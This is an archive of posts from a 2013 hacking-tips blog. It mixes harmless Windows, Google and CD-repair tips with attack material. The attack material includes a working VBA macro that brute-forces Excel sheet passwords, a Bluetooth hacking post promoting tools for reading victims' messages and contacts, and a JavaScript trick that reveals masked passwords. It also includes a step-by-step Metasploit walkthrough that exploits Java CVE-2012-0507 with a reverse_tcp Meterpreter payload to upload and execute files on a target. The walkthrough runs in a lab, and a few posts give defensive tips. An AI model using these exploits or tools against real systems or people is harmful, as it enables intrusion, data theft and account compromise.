Red Crook: November 2013

Add Your Name (or) Application to right click Of My Computer

Caution ..
As it is related to Windows regisrty it can be dangerous
so,Try This at ur own risk

To write your name on right click application
please follow the steps.

1.Copy/Paste the following code in Notepad And then Save it as .reg

Windows Registry Editor Version 5.00
[HKEY_CLASSES_ROOT\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\shell\Registry Editor]
@="Your Name Or Name of the Application"
[HKEY_CLASSES_ROOT\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\shell\Registry Editor\command]
@="Location Of The Application"

2.Now edit it and then Type your name In

Eg:

[HKEY_CLASSES_ROOT\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\shell\Registry Editor]
@="Rajesh"

3. If u want to get any application, once you click Your name or name of application
Then , Type the location Of the application Which u want to open In:

[HKEY_CLASSES_ROOT\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\shell\Registry Editor\command]
@="Location Of The Application"

For eg.C:\Program Files\Yahoo!\Messenger\messenger.exe
Thats It finally save it And then Run it .

------------------------------------------------------------
To add Application Control Panel

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\shell\Control Panel\command]
@="rundll32.exe shell32.dll,Control_RunDLL"

To add Application Add/Remove

[HKEY_CLASSES_ROOT\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\shell\Add/Remove\command]
@="control appwiz.cpl"

To add Application Reboot

[HKEY_CLASSES_ROOT\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\shell\[Reboot]\command]
@="shutdown -r -f -t 5"

To add Application Shutdown

[HKEY_CLASSES_ROOT\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\shell\[Shutdown]\command]
@="shutdown -s -f -t 5"

How to Unprotect an excel sheet without password

THis document will tel you how to unprotect an excel spread sheet without having the password

In case of a password protect worksheet you are unable to Edit the data on the Excel Sheet. If you do not Remember the Password or do not know the password to unprotect the sheet just follow the below simple steps.
excel1

Press ALT + F11 or click on View Code in Developers Tabs
Excel2

In the Above White Space Enter the below Code. Do not change the code just copy paste:
Sub PasswordBreaker()
    'Breaks worksheet password protection.
    Dim i As Integer, j As Integer, k As Integer
    Dim l As Integer, m As Integer, n As Integer
    Dim i1 As Integer, i2 As Integer, i3 As Integer
    Dim i4 As Integer, i5 As Integer, i6 As Integer
    On Error Resume Next
    For i = 65 To 66: For j = 65 To 66: For k = 65 To 66
    For l = 65 To 66: For m = 65 To 66: For i1 = 65 To 66
    For i2 = 65 To 66: For i3 = 65 To 66: For i4 = 65 To 66
    For i5 = 65 To 66: For i6 = 65 To 66: For n = 32 To 126
    ActiveSheet.Unprotect Chr(i) & Chr(j) & Chr(k) & _
        Chr(l) & Chr(m) & Chr(i1) & Chr(i2) & Chr(i3) & _
        Chr(i4) & Chr(i5) & Chr(i6) & Chr(n)
    If ActiveSheet.ProtectContents = False Then
        MsgBox "One usable password is " & Chr(i) & Chr(j) & _
            Chr(k) & Chr(l) & Chr(m) & Chr(i1) & Chr(i2) & _
            Chr(i3) & Chr(i4) & Chr(i5) & Chr(i6) & Chr(n)
         Exit Sub
    End If
    Next: Next: Next: Next: Next: Next
    Next: Next: Next: Next: Next: Next
End Sub
Now Click on the Run Button or press F5:
Excel3

And there you go the sheet is unprotected for you now. Also you would be getting a message in the pop up window.
This Message is contains the password which can be used to unprotect the other sheets in the same workbook.
Excel4

BlueTooth Hacking

Discovering Bluetooth Devices :-
Before any two bluetooth enabled devices can start communicating with one another, they must carry out a procedure known as discovery. It can be carried out by scanning for other active devices within the range.

Hacking Bluetooth Devices :-
There are a variety of different types of bluetooth related threats and attacks that can be executed against unsuspecting mobile phone users. Following are some of the most common types of threats :-

1) BluePrinting Attack :- Information gathering is the first step in the quest to break into target system. Even BlueTooth devices can be fingerprinted or probed for information gathering using the technique known as BluePrinting. Using this one can determine manufacturer, model, version, etc. for target bluetooth enabled device.

2) BlueJack Attack :- Bluejacking is the process of sending an anonymous message from a bluetooth enabled phone to another, within a particular range without knowing the exact source of the recieved message to the recepient.

3) BlueSnarf Attack :- Bluesnarfing is the process of connecting vulnerable mobile phones through bluetooth, without knowing the victim. It involves OBEX protocol by which an attacker can forcibly push/pull sensitive data in/out of the victim's mobile phone, hence also known as OBEX pull attack.
This attack requires J2ME enabled mobile phones as the attacker tool. With J2ME enabled phone, just by using bluesnarfing tools like Blooover, Redsnarf, Bluesnarf, etc. an attacker can break into target mobile phone for stealing sensitive data such as address book, photos, mp3, videos, SMS, ......!

4) Blue Backdoor Attack :- Here, the bluetooth related vulnerability exploits the pairing mechanism that is used to establish a connection between two bluetooth enabled devices.Not only does it gives the attacker complete access and control over the target but also allows the attacker to place strategic backdoors for continued access and entry.

5) BlueBug Attack :- It was first discovered by Martin Herfurt and allows attackers to gain complete control over the data, voice and messaging channels of vulnerable target mobile phones.

6) The bluetooth protocol allows devices to use 16 digit long pairing codes. Unfortunately many applications continue to use only 4 digit pairing codes which can be easily brute-forced. This is known as short pairing codes.
Most slave bluetooth devices continue to use default pairing codes such as 0000, 1111, 1234, etc. So, easy to crack and gain access...!

-: Other Powerful BlueTooth Hacking Tools :-

Transient Bluetooth Environment Auditor :- T-BEAR is a security-auditing platform for Bluetooth-enabled devices. The platform consists of Bluetooth discovery tools, sniffing tools and various cracking tools.

Download
BlueTest :- BlueTest is a Perl script designed to do data extraction from vulnerable Bluetooth-enabled devices.

Download
BTAudit :- BTAudit is a set of programs and scripts for auditing Bluetooth-enabled devices.

Download
RedFang :- It is a brute force tool that finds even non-discoverable device.

Download
BlueAlert :- A windows based tool that runs on bluetooth enabled computer and alerts the user each time a blurtooth device leaves or enters into its range.
BlueFang :- Similar to BlueAlert.
Bluestumbler :- One of the best BluePrinting tool.

Super Bluetooth Hack :- With this java software you can connect to another mobile and ….

Once connected to a another phone via bluetooth you can-

Read his/her messages

Read his/her contacts

Change profile

Play ringtone even if phone is on silent

Play songs

Restart the phone

Switch off the phone

Restore factory settings

Change ringing volume

Call from his phone it includes all call functions like hold, etc.

Notes:-
1) When connecting devices use a code 0000
2) At start of program on smartphones do not forget to turn on bluetooth before start of the mobile .

Download- Super_Bluetooth_Hack_v1.07.zip (99 KB)

Wireless Hacking

Wireless networks broadcast their packets using radio frequency or optical wavelengths. A modern laptop computer can listen in. Worse, an attacker can manufacture new packets on the fly and persuade wireless stations to accept his packets as legitimate.
The step by step procedure in wireless hacking can be explained with help of different topics as follows:-

1) Stations and Access Points :- A wireless network interface card (adapter) is a device, called a station, providing the network physical layer over a radio link to another station.
An access point (AP) is a station that provides frame distribution service to stations associated with it.
The AP itself is typically connected by wire to a LAN. Each AP has a 0 to 32 byte long Service Set Identifier (SSID) that is also commonly called a network name. The SSID is used to segment the airwaves for usage.

2) Channels :- The stations communicate with each other using radio frequencies between 2.4 GHz and 2.5 GHz. Neighboring channels are only 5 MHz apart. Two wireless networks using neighboring channels may interfere with each other.

3) Wired Equivalent Privacy (WEP) :- It is a shared-secret key encryption system used to encrypt packets transmitted between a station and an AP. The WEP algorithm is intended to protect wireless communication from eavesdropping. A secondary function of WEP is to prevent unauthorized access to a wireless network. WEP encrypts the payload of data packets. Management and control frames are always transmitted in the clear. WEP uses the RC4 encryption algorithm.

4) Wireless Network Sniffing :- Sniffing is eavesdropping on the network. A (packet) sniffer is a program that intercepts and decodes network traffic broadcast through a medium. It is easier to sniff wireless networks than wired ones. Sniffing can also help find the easy kill as in scanning for open access points that allow anyone to connect, or capturing the passwords used in a connection session that does not even use WEP, or in telnet, rlogin and ftp connections.

5 ) Passive Scanning :- Scanning is the act of sniffing by tuning to various radio channels of the devices. A passive network scanner instructs the wireless card to listen to each channel for a few messages. This does not reveal the presence of the scanner. An attacker can passively scan without transmitting at all.

6) Detection of SSID :- The attacker can discover the SSID of a network usually by passive scanning because the SSID occurs in the following frame types: Beacon, Probe Requests, Probe Responses, Association Requests, and Reassociation Requests. Recall that management frames are always in the clear, even when WEP is enabled.
When the above methods fail, SSID discovery is done by active scanning

7) Collecting the MAC Addresses :- The attacker gathers legitimate MAC addresses for use later in constructing spoofed frames. The source and destination MAC addresses are always in the clear in all the frames.

8) Collecting the Frames for Cracking WEP :- The goal of an attacker is to discover the WEP shared-secret key. The attacker sniffs a large number of frames An example of a WEP cracking tool is AirSnort ( http://airsnort.shmoo.com ).

9) Detection of the Sniffers :- Detecting the presence of a wireless sniffer, who remains radio-silent, through network security measures is virtually impossible. Once the attacker begins probing (i.e., by injecting packets), the presence and the coordinates of the wireless device can be detected.

10) Wireless Spoofing :- There are well-known attack techniques known as spoofing in both wired and wireless networks. The attacker constructs frames by filling selected fields that contain addresses or identifiers with legitimate looking but non-existent values, or with values that belong to others. The attacker would have collected these legitimate values through sniffing.

11) MAC Address Spoofing :- The attacker generally desires to be hidden. But the probing activity injects frames that are observable by system administrators. The attacker fills the Sender MAC Address field of the injected frames with a spoofed value so that his equipment is not identified.

12) IP spoofing :- Replacing the true IP address of the sender (or, in rare cases, the destination) with a different address is known as IP spoofing. This is a necessary operation in many attacks.

13) Frame Spoofing :- The attacker will inject frames that are valid but whose content is carefully spoofed.

14) Wireless Network Probing :- The attacker then sends artificially constructed packets to a target that trigger useful responses. This activity is known as probing or active scanning.

15) AP Weaknesses :- APs have weaknesses that are both due to design mistakes and user interfaces

16) Trojan AP :- An attacker sets up an AP so that the targeted station receives a stronger signal from it than what it receives from a legitimate AP.

17) Denial of Service :- A denial of service (DoS) occurs when a system is not providing services to authorized clients because of resource exhaustion by unauthorized clients. In wireless networks, DoS attacks are difficult to prevent, difficult to stop. An on-going attack and the victim and its clients may not even detect the attacks. The duration of such DoS may range from milliseconds to hours. A DoS attack against an individual station enables session hijacking.

18) Jamming the Air Waves :- A number of consumer appliances such as microwave ovens, baby monitors, and cordless phones operate on the unregulated 2.4GHz radio frequency. An attacker can unleash large amounts of noise using these devices and jam the airwaves so that the signal to noise drops so low, that the wireless LAN ceases to function.

19) War Driving :- Equipped with wireless devices and related tools, and driving around in a vehicle or parking at interesting places with a goal of discovering easy-to-get-into wireless networks is known as war driving. War-drivers (http://www.wardrive.net) define war driving as “The benign act of locating and logging wireless access points while in motion.” This benign act is of course useful to the attackers.
Regardless of the protocols, wireless networks will remain potentially insecure because an attacker can listen in without gaining physical access.

Google Tricks, Easter Eggs & Secrets

Google's engineers love to hide some pretty cool tricks at the most unexpected places. Add to that Google's policy of giving 20% of working time to its engineers to do what they want, and you have a search engine filled with lots of entertaining Easter eggs and tricks.

Sadly, most of these tricks are still a secret, but every now and then, Google employees leak these cool insider pranks and the whole world gets to know about them. Here, I have created a list of all such known Google tricks and Easter eggs that are still "working."

Kerning
Kerning means adjusting the spacing between characters. So, how would you expect Google to describe it? Literally, off course. When you search Google for Kerning, the spacing of the word Kerning is changed as compared to that of other words. This only works with personalized results disabled.

Conway's Game Of Life
Conway's Game Of Life is a game that indicates how cellular life evolves based on the initial configuration. If you search Google for Conway's Game of Life, you will get a results page with the game running in the background.

Jason Isaacs
Just search for Jason Isaacs and Google will return a page saying Hello to him. This only works on Google UK. This is a reference to Kermode and Mayo's Film reviews which greets Jason with hello every week.

Bacon Number {Actor Name}
Kevin Bacon is a famous hollywood actor who was quoted as saying that he has worked with everybody in hollywood or somebody who has worked with them in 1994. This led to many websites being launched about his claim in 2007. Bacon seeing this immense response launched a charitable website called Six Degrees, which is based on a theory that everyone in hollywood has worked with Kevin Bacon through a chain of six acquaintances or less. An actor gets as many degrees as he is distant from Kevin Bacon's movies in terms of people in the chain of acquaintances.

Google too has now involved Six Degrees of Bacon in its search results. For example, searching Google for Bacon Number Johnny Depp gives Depp's Bacon number to be 2.

Google knows how to celebrate the holidays
Searching Google for a holiday will make Google return a page decorated with items representing that holiday. For example, searching Google for Christmas returns a page decorated with Christmas lights. This also works for Kwanzaa, Hanukkah, Halloween and Festivus. These Easter Eggs based on a festival are only activated when that festival is near.

Zerg Rush
Search Google for Zerg Rush and you will see the O's of Google attacking the search results page. They will attacking every result one by one. There is a health bar which indicates how injured a search result is. You can also kill these O's by clicking on them. They also have health bars which indicates their health. You get points on the basis of how many O's you kill. The aim of this game is to beat as many O's as possible.

Askew or Tilt
Ever had the chance of searching Google for Askew or Tilt? If you have, then you already know what comes up. If you haven't, do it now and you will see the search results page literally tilt to give you a better idea of what these words mean. This will work only if you use latest browsers which support HTML5 and CSS3. So, Internet Explorer users, use Firefox, Google Chrome or Safari for a while to use this.

Do a barrel roll

'Do a barrel roll' in its true sense means to do a 360 degree spin. Google takes practical demonstrations way too seriously for this one and literally spins the search results page to give you a clearer idea of the meaning of this phrase. Don't believe me? Go search Google for Do a barrel roll now and see your world turn around.

This Easter egg is apparently a tribute to Star Fox, a video game series developed by Nintendo, because searching Google for Z or R Twice also does the barrel roll, just like in Star Fox. Many bloggers interpreted a lot of different things from this, but Google clarified that this fun trick was created by a Google Engineer solely for the purpose of entertaining users along with showing the power of new HTML5 and CSS3 technologies. Like the previous Easter egg, this will only work in modern browsers.

Binary, Octal and Hexadecimal Number systems
Another one of those literal Google Easter eggs. If you search Google for "Binary", "Octal" or "Hexadecimal" (without quotes) with Search Plus Your World disabled, Google will show the number of results in the same number system. For example, searching Google for hexadecimal will return the number of results like in the image below.

Recursion
The "Did you mean?" feature of Google often helps many users to get to the right results when they type something different from what they intended to search. If you search Google for recursion, the same feature takes you to an endless loop of clicks all linking to the same results page thereby completing recursion, which occurs when something calls itself. Seriously geeky.

Anagram
Another one of those "Did you mean?" Easter eggs. Search Google for Anagram and Google will instantly ask whether you meant "Nag A Ram" which is one of the anagrams of the word "anagram." Google really shows their word-playing skills with this one.

Asking Google to define Anagram makes Google ask if you meant nerd fame again.

ASCII Art
Are you a fan of ASCII art? Google surely is. Search Google for ASCII art and Google will greet you with a search results page having an ASCII version of the Google logo at the place where normal logo should have been. This Easter egg does not work anymore. When it did work, it looked like the image given below.

Google Calculator Easter Eggs: The loneliest number

Do you know which is the loneliest number? Ask Google Calculator. Search Google for the loneliest number and the in-search Google Calculator will give one as the answer, which apparently is a tribute to the Harry Nilsson's song "One."

Once in a Blue Moon

Ever wondered how much is 'once in a blue moon'? You must have heard this phrase often but Google calculator will give you the exact value of this phrase and surprisingly, it denotes frequency rather than time. Go search Google for this to get "1.16699016 × 10-8 hertz" as the answer.

The number of horns on a unicorn
Want to know the number of horns on a unicorn? Google calculator can help. Searching Google for the number of horns on a unicorn will give 1 as the answer.

Answer to the Ultimate Question of Life, the universe and everything

Google is omniscient. Even the "answer to the ultimate question of life, the universe and everything" is known to Google. Just search Google for the above phrase and Google calculator will give you an answer. What are you waiting for? Just go to Google and find the true meaning of life.

[Pause to give you the time to search]

Surprised by the answer (42)? This is a reference to The Hitchhiker's Guide to the Galaxy, a popular novel based on a radio show (by the same name) of the late seventies. Google engineers surprised you with these tricks, didn't they?

How hackers hack Facebook Account & How to stop them?

Facebook is, undoubtedly, the most popular social networking website with more than 500 million active users. Due to its popularity, many hackers (or should I say crackers?) are actively involved in hacking Facebook accounts of unsuspecting users. This article outlines the many strategies that such hackers use to gain access to Facebook accounts of hundreds of users each day and how you can stop them from hacking your account.

Facebook is one of the prime target of hackers!

Email Address Hack

I have always been puzzled by Facebook's leniency in this matter. All a hacker needs to do is know your email address and he will be displayed a confirmation showing your name even if he enters the wrong password. How easily a hacker can then hack your Facebook account if he 'guesses' your password (if you use a weak password) or answers your security question! This is something I hope Facebook improves on quickly. Until Facebook does so, here are some tricks you can use to protect yourself from this vulnerability.

How to safeguard your Email Address?
Just follow these steps:-

Hide your Email Address from everyone by going to Edit Profile>Contact Information>Clicking on the icon beside your email address> checking 'Only Me'.
Change your primary email address to a one that is only known to you by going to Account Settings>Email> and changing your primary email to the new one (known only to you) and removing your previous email address.
For additional security, when in Account Settings, check 'Secure browsing' and 'Send me an email when a new computer or mobile device logs into this account' and click Save.

A hacker at work!

Phishing

Phishing is one of the easiest ways to trick users into giving out their login credentials. All a hacker does is setup a webpage similar in design to that of the Facebook homepage, attach a server sided script to track the username and password entered and store it in a log. Sending people emails stating that someone tagged a photo of them on Facebook in the same format as Facebook and giving a link below to the phishing website further reduces the chances of it being detected as a fake. Sometimes, spam Facebook apps, like those promising to tell who viewed your Facebook profile, automatically post links to phishing websites. A new trend amongst phishers is creating Facebook look-a-like widgets for stealing user's login credentials.

How to prevent yourself from being phished?
At all costs, avoid clicking on suspicious links. Moreover, always check the URL in the address bar before signing in. Avoid logging in through various "Facebook widgets" offered by websites and blogs. Instead, use Facebook's homepage to sign in. Always try to use Safe Search while searching. If you do manage to get phished, report the website so that others may get a warning before visiting it.

Keylogging through Keyloggers

Keylogger is a type of computer virus that tracks key strokes. Keyloggers can be installed remotely on a computer system by a cracker to record all the activity that is going on the victim's computer. Keylogging gets more easy if the hacker has physical access to the victim's computer.

How to stop keyloggers?
Install a good antivirus and update it frequently. Do not click on suspicious links and avoid downloading illegal software. Also, avoid installing free toolbars and other such spam software. Always scan third-person's flash and pen drives before using them on your computer.

Social Engineering

Social engineering involves using any trick to fool the user into making himself vulnerable to exploits. This could involve anything from sending spoof emails, pretending to be from Facebook, telling you to change your password to 12345678 to a hacker maliciously getting out the answer to your Security Question in a friendly chat or discussion.

How to prevent yourself from being socially engineered?
Stay aware during chats and discussions. Use a tough security question, preferably one whose answer you would never disclose to anyone. Moreover, Facebook, or any other company for that matter, will never ask you to change your password to 12345678 or do something as silly as asking you to send out your login details to prove that you are an active user. Always think before taking actions and your e-life on Facebook will be safe from hackers looking to hack Facebook accounts.

Change Facebook Theme, Color & Appearance

Facebook is a social networking site which enables people to connect with friends and people around. That's how Facebook is usually introduced. However, Facebook is beyond the need of being introduced as almost everyone is on it. Despite its popularity, Facebook has one flaw; the default blue theme is really boring.

Some even consider it an annoyance while visiting Facebook. As Facebook does not allow users to change its theme like MySpace used to, users are left with no other option but to bear the theme Facebook wants them to use.

However, it is relatively easy to change the Facebook theme to a stylish one using an addon and custom themes which are available free of cost on the internet.

An example of the final outcome would be something like in the image.

This is the Ferrari theme. More themes are available for you to choose.

Requirement: The basic requirement for this to work is to have Mozilla Firefox or Google Chrome as your browser.

Steps to achieve this: If you use Google Chrome, click here. Mozilla Firefox users should carry out the following steps to successfully change Facebook theme.

Open Mozilla Firefox and install 'Stylish' addon.
Follow the basic steps to install the addon.
Restart Firefox after successfully installing the Stylish addon.
Login to your Facebook Account and click on the small 'S' button in your Firefox status bar.
Click on "Find Styles for this Site" to open a new tab with free themes to use for Facebook.
Click on any theme and a preview will be shown.
If everything is fine in the previewed theme, click on "Install with Stylish" button at the top right corner of the page.
A dialog box will open.
Click on Install in the dialog box.

Steps for Google Chrome

Install Stylish for Chrome from the Chrome Web Store.
Navigate to Facebook.com and click on the S button.
Click on "Find Styles for this Site" to open a new tab with free themes to use for Facebook.
Click on any theme and a preview will be shown.
If everything is fine in the previewed theme, click on "Install with Stylish" button at the top right corner of the page.

Installing Ferrari theme for Stylish Firefox

Now whenever you open Facebook, it will show the theme that you have installed with Stylish instead of the boring old blue theme.

Use Keyboard as Mouse

If your mouse is not working and you don't wish to wait till you get a new mouse, you would definitely like to know how you can use your keyboard as your mouse. It is easy to use your mouse as keyboard in Windows using the On Screen Keyboard utility, but it is also possible to do the reverse.

All you need to do is:

Windows XP Users:-

Go to Control Panel.
Then click on Switch to Classic View.
Then Click on Accessibility Options.
Then Click on the Mouse Tab.
Select Use MouseKeys.
Click on OK.
Then activate NumberLock (by pressing the NumLk key).
You should hear a beep sound.
Now you can control the mouse pointer using the arrow keys on the numeric keypad.

Windows 8, Windows 7 and Vista Users:

Open Ease of Access Center by clicking the Start button , clicking Control Panel, clicking Ease of Access, and then clicking Ease of Access Center.
Click Make the mouse easier to use.
Under Control the mouse with the keyboard, select the Turn on Mouse Keys check box.

You can also increase the acceleration and speed of your mouse movements according to your needs.

You can alternately press the Alt+Shift+Num Lock combination to instantly activate the mouse keys.

For laptops, this will only work if your laptop keyboard has a numeric keypad or alternative keys which you can enable by pressing the Number Lock Key or the Function key.

On my laptop, number 6 key of the numeric keypad moves the mouse pointer left, number 4 key moves the mouse pointer right, number 2 key moves it down, number 8 key moves the mouse pointer up, number 5 and + key serve as right click while the number 0 key works as left click.

Computer Viruses

What is a Computer Virus ?
A potentially damaging computer programme capable of reproducing itself causing great harm to files or other programs without permission or knowledge of the user.
Types of viruses :-
The different types of viruses are as follows-

1) Boot Sector Virus :- Boot sector viruses infect either the master boot record of the hard disk or the floppy drive. The boot record program responsible for the booting of operating system is replaced by the virus. The virus either copies the master boot program to another part of the hard disk or overwrites it. They infect a computer when it boots up or when it accesses the infected floppy disk in the floppy drive. i.e. Once a system is infected with a boot-sector virus, any non-write-protected disk accessed by this system will become infected.

Examples of boot- sector viruses are Michelangelo and Stoned.

2) File or Program Viruses :- Some files/programs, when executed, load the virus in the memory and perform predefined functions to infect the system. They infect program files with extensions like .EXE, .COM, .BIN, .DRV and .SYS .

Some common file viruses are Sunday, Cascade.

3) Multipartite Viruses :- A multipartite virus is a computer virus that infects multiple different target platforms, and remains recursively infective in each target. It attempts to attack both the boot sector and the executable, or programs, files at the same time. When the virus attaches to the boot sector, it will in turn affect the system’s files, and when the virus attaches to the files, it will in turn infect the boot sector.
This type of virus can re-infect a system over and over again if all parts of the virus are not eradicated.

Ghostball was the first multipartite virus, discovered by Fridrik Skulason in October 1989.
Other examples are Invader, Flip, etc.

4) Stealth Viruses :- These viruses are stealthy in nature means it uses various methods for hiding themselves to avoid detection. They sometimes remove themselves from the memory temporarily to avoid detection by antivirus. They are somewhat difficult to detect. When an antivirus program tries to detect the virus, the stealth virus feeds the antivirus program a clean image of the file or boot sector.

5) Polymorphic Viruses :- Polymorphic viruses have the ability to mutate implying that they change the viral code known as the signature each time they spread or infect. Thus an antivirus program which is scanning for specific virus codes unable to detect it's presense.

6) Macro Viruses :- A macro virus is a computer virus that "infects" a Microsoft Word or similar application and causes a sequence of actions to be performed automatically when the application is started or something else triggers it. Macro viruses tend to be surprising but relatively harmless.A macro virus is often spread as an e-mail virus. Well-known examples are Concept Virus and Melissa Worm.

Facebook Hack – View photo albums of non-friends

A new facebook exploit allows anyone to access any photo album of non-friends as long as you have the link.

By following the simple steps shown in above image, you can bypass the security of Facebook and view photos of others online.

Pop A Banner Each Time Windows Boots

To pop a banner which can contain any message you want to display just before a user is going to log on.

Go to the key :- HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WinLogon
Now create a new string Value in the right pane named 'LegalNoticeCaption' and enter the value that you want to see in the MenuBar.

Now create yet another new string value and name it:
'LegalNoticeText'.
Modify it and insert the message you want to display each time Windows boots.

This can be effectively used to display the company's private policy each time the user logs on to his NT box.

It's '.reg' file would be:
REGEDIT4 [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Winlogon] "LegalNoticeCaption"="Caption here."

Reveal *****(Asterisk) Passwords Using Javascript

Want to Reveal the Passwords Hidden Behind Asterisk (****) ?

Follow the steps given below-

1) Open the Login Page of any website. (eg. http://mail.yahoo.com)

2) Type your 'Username' and 'Password'.

3) Copy and paste the JavaScript code given below into your browser's address bar and press 'Enter'.

javascript: alert(document.getElementById('Passwd').value);

4) As soon as you press 'Enter', A window pops up showing Password typed by you..!

Note :- This trick may not be working with firefox.

Chat with Friends through ms dos Command Prompt

1) All you need is your friend's IP Address and your Command Prompt.

2) Open Notepad and write this code as it is.....!

@echo off

:A

Cls

echo MESSENGER

set /p n=User:

set /p m=Message:

net send %n% %m%

Pause

Goto A

3) Now save this as "Messenger.Bat".

4) Open Command Prompt.

5) Drag this file (.bat file) over to Command Prompt and press Enter.

6) You would then see something like this:

7) Now, type the IP Address of the computer you want to contact and press enter
You will see something like this:

8) Now all you need to do is type your message and press Enter.
Start Chatting.......!

How to hack remote computer

How to hack remote computer using Metasploit? Exploiting Java vulnerability CVE-2012-0507

Whenever someone say PenTesting tool, the first thing come in our mind is MetaSploit . Today, i am going to demonstrate how to use the Metasploit tool to exploit the popular java AtomicReferenceArray Type Violation vulnerability(CVE-2012-0507).

About MetaSploit:
Metsploit is a very Powerful PenTesting Tool . Metasploit Framework, a tool for developing and executing exploit code against a remote target machine. The Metasploit Project is also well known for anti-forensic and evasion tools, some of which are built into the Metasploit Framework. Very useful tool for Information Gathering, Vulnerability Scanning, Exploit Development, Client side exploits,...

Mastering the Framework: A free course from Offensive-Security
The Offensive Security Team along with several active community members, made a free course on the Metasploit Framework "Mastering the Framework". The course covers Information gathering, Social engineering attacks, exploit development, Advance AV avoidance and etc...

The course is available here:
www.offensive-security.com/metasploit-unleashed/Introduction

Donate to HFC, Feed a Child!
The "Mastering the Framework" is free course. If you enjoyed the course, please donate to Hackers for Charity(HFC). Beyond merely providing food for children in need in East Africa, the Hackers for Charity Food Program enables children and their families to provide for themselves and become more self-sufficient by teaching them valuable agricultural skills. Every cent received is directly sent Hackers for Charity in support of their mission. Any amount, no matter how small, makes a difference; it only takes $9.00 to feed a child for a month.

You can find further details about the donation here:
http://www.offensive-security.com/metasploit-unleashed/Donate

Hey, where are you going?! Wait a Sec, take that course Once i demonstrate how to use the metasploit. Because, It will be hard to understand or boring, if you read those things directly.

Requirements:

VirtualBox
Target OS(windows,...)
PenTesting Distro(Backtrack )
JRE 6(unpatched version)

CVE-2012-0507 is a vulnerability in the JRE due to the fact that The AtomicReferenceArray class implementation did not properly check if the array is of an expected Object[] type. A malicious Java application or applet could use this flaw to cause Java Virtual Machine(JVM) to crash or bypass Java sandbox restrictions.

Security News: This vulnerability affects Windows, Mac and Linux operating systems. Last month, Flashback malware infect more than 600,000 Mac computers by exploiting this vulnerability. Recently, The INSS , The Amnesty International UK websites injected with malicious code that exploit the CVE-2012-0507.

I am going to demonstrate this vulnerability with VirtualBox. I have setup two Virtual Machines namely "Target" and "BT5". I have installed XP 2 in the Target and Backtrack 5 R2 in the 'BT5'.

(need help in configuring the VM?, read this: setup PenTesting Lab).

Part I: Preparing the Target Machine:

Start the "Target" Machine.
Install the JRE 6.

Part II: Preparing the PenTesting Machine:

Now, start the BT5.

Open the Terminal and Type "msfupdate". This will update the Metasploit Framework(MSF) with the latest exploits and Payloads. As CVE-2012-0507 is latest vulnerability, you have to update the MSF before proceeding further.

slow Internet Connection?! If you have slow internet connection, then you can download the java_atomicreferencearray module alone instead of updating all modules.
Download the java_atomicreferencearray.rb and paste in this folder "/opt/metasploit/msf3/modules/exploits/multi/browser/"

Then, Download CVE-2012-0507.jar and paste in this folder "/opt/metasploit/msf3/data/exploits/"

Part III :

Exploiting the Java AtomicReferenceArray Type Violation Vulnerability:

Step 1:
Open the Terminal and type "msfconsole". This will bring the Metasploit console , here you can interact with the MSF.

Step 2:
Type "use exploit/multi/browser/java_atomicreferencearray" . This command will use the java_atomicreferencearray.rb module for the attack.

Now type "show options" to display the which settings are available and/or required for this specific module.

Now type "set SRVPORT 80".
and "set URIPATH /".

Step 3: Set Payload
Type "show payloads", this will displays the list of payloads. We are going to use the 'reverse_tcp' payload. This payload will get reverse tcp connection from the Target to PenTesting machine.

Type 'set payload java/meterpreter/reverse_tcp' in the console.

set LHOST [IP_address] : In order to get reverse connection, we have to set our IP in the LHOST.

open the Terminal and type "ifconfig". This will display the IP info of our PenTesting Machine. The IP will be "192.168.56.x". For instance, let me say the ip is 192.168.56.10.

Now Type in the msfconsole as "set LHOST 192.168.56.10".

Part IV: Breaching the Target Machine:

So , are you ready?! Let us break into the Target Machine.

Step 1:

Type "exploit" in the msfconsole. This will start the reverse handler to our Machine and it will wait anyone that will connect to the our HTTP server (Eg: http://192.168.56.10). Once victim connect to our server, it will send a jar will that will exploit the CVE-2012-0507 vulnerability.

step 2:

Open the Firefox/IE in the Target machine.
Enter "http://192.168.56.10".
It loads nothing but exploit will run in the background.

Step 3:
Open the BT5 machine, it will display the following output:

Now type "sessions", this will show the list of active sessions .

Type "sessions -i 1", this will open the connection to the session with the id '1' and bring you to Meterpreter. Meterpreter will help you to interact/control with the Target.

Step 4:Upload files
Yeeeh..! we got backdoor to the Target machine, now we can run any commands in the Target.

For Example, Typing 'sysinfo' will display the system information.

You can also upload and execute your own executable files in the Target machine.

'upload /Test.exe c:\\", this command will upload the Test.exe from the root('file system' dir) folder of the BT5 to the C drive of the Target.

'execute -f C:\\Test.exe", this command will run our uploaded File in the Target.

Security Tips:

Update your JRE to the latest version.

Pls Dont Try

Tips to recover scratched CD's

1. Spread a cloth on a flat surface and place the CD on it.
2. Then, hold the disc with one hand, use the other to wipe the polish into the affected area with a soft cloth.
3. Wait for it to dry and buff using short, brisk strokes along the scratch, not across it.
4. A cloth sold to wipe spectacles or camera lenses will work super m8's.
5. When you can no longersee the scratch,, wash the disc with water and let it dry before playing. Intersting isnt it? Try it right now
I have used toothpaste with good effects before Ive also used car paint cutting compound on deeper scratches. It does leave lots of smaller scratches (as it is a cutting compound after all) but it will remove the worst scratches in most cases.
ya u r gng to b surely befinited by this Operation